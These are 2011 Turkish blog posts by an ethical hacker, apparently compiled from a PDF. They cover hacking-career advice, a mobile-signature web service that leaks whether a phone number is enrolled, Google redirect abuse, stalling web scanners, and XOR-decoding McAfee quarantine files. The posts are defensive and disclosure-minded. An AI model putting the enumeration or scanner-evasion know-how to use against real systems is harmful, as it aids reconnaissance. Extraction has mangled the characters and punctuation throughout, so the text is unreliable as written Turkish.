Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

